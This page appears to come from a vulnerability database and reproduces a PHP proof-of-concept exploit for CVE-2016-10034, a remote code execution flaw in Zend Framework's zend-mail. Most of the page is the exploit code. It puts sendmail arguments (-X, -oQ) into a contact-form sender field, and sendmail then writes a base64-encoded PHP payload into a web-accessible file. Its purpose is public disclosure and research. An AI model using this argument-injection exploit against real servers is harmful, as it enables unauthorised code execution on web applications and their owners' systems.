Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

Related Vulnerabilities: CVE-2016-10034  
Publish Date: 30 Dec 2016
Author: Dawid Golunski
Source / Download Exploit 
                							

                &lt;?php
 
/*
 
Zend Framework &lt; 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail &lt; 2.4.11 
zend-mail &lt; 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 &lt;&lt;&lt; Content-Type: text/html; charset=us-ascii
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; &lt;?php phpinfo(); ?&gt;
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; 
09607 &lt;&lt;&lt; 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' =&gt; array(
                'autoregister_zf' =&gt; true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')-&gt;run();

$message        = new \Zend\Mail\Message();

$message-&gt;setBody($msg_body);
$message-&gt;setFrom($email_from, 'Attacker');
$message-&gt;addTo('support@localhost', 'Support');
$message-&gt;setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport-&gt;send($message);

?&gt;

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started